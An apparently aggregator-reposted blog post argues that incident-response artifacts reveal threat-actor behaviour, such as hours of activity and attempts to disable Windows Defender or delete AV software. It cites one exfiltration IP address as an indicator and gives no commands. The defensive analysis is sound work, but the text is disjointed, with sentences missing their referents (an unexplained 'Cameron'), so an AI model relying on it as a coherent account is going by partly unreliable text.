I. I've always been a fan of books or shows where someone follow clues and develops an overall picture to lead them to their end goal.
The main web page even includes a brief history of behavioral profiling.
Apparently ,it is, as there's research to suggest that this is the case.
Further, Google lists a number of resources dedicated to cyber behavioral profiling.
I ask the question, as this is something I've looked at for some time now, in order to not only develop a better understanding of targeted threat actors who are still active during incident response, but to also determine the difference between a threat actor's actions during the response, and those of others involved.
By going beyond just individual data points and looking at the multifaceted, nuanced nature of those artifacts, we can begin to discern patterns that inform us about the intent, sophistication, and situational awareness of the threat actor.
To that end, Joe Slowik has correctly stated that there's a need in CTI to view indicators as composite objects, that things like hashes and IP addresses have greater value when other aspects of their nature is understood.
Many times we tend to view IP addresses one-dimensionally; however, there's so much more about those indicators that can provide insight to the threat actor behind them, such as when, how, and in what context that IP address was used.
Here's an example of an IP address; in this case, 185.56.83.82.
We can get some insight on this IP address from VirusTotal, enough to know that we should probably pay attention.
If you read the blog post, you'll see that this IP address was used as the target for data exfiltration.
The point of all this is that there's more to the data we have available than just the one-dimensional perspective that we're used to thinking in, in which we've been viewing that data.
Now, if we begin to incorporate other data sources that are available to us, we'll being to see exactly how, as Cameron stated, human behavior renders in digital forensics.
Some of the things I've pursued and been successful in demonstration during previous engagements includes things like hours of operations, preferred TTPs and approaches, enough so to separate the actions of two different threat actors on a single endpoint.
I've also gained insight into the situational awareness of a threat actor by observing how they reacted to stimulus; during one incident, the installed EDR framework was blocking the threat actor's tools from executing on different endpoints.
The threat actor never bothered to query any of the three endpoints to determine what was blocking their attempts; rather, on one endpoint, they attempted to disable Windows Defender.
On the second endpoint, they attempted to delete a specific AV product, without ever first determining if it was installed on the endpoint; the batch file they ran to delete all aspects and variations of the product were not preceded by query commands.
When none of these succeeded in allowing them to pursue their goals, they left.
Yes, viewed through the right lens, with the right perspective, human behavior can be discerned through digital forensics.
This Cyber News was published on windowsir.blogspot.com. Publication date: Wed, 03 Jan 2024 19:43:05 +0000